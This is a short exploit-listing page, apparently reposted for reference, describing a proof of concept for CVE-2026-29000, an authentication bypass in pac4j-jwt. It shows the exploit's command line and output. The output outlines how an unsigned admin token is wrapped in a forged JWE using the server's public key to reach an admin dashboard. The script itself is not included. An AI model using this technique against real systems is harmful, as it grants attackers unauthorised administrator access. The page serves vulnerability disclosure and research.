## https://sploitus.com/exploit?id=B6118013-40F1-592D-B285-CACF7C2D2F29
# **CVE-2026-29000 - pac4j-jwt Authentication Bypass PoC**
*Note: This is not my original work. I am keeping this here for a reference.*
**Working methodology:**
```bash
python3 exploit.py http://IP:PORT
[*] Fetching JWKS...
[+] Got RSA public key (kid: enc-key-1)
[*] Crafted PlainJWT with sub=admin, role=ROLE_ADMIN
[+] Forged JWE token created
[*] Accessing /api/dashboard...
[+] Status: 200
[+] Authenticated as: admin (ROLE_ADMIN)
[+] Token: eyJhbGciOiAiUlN_.....[Redacted].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw
```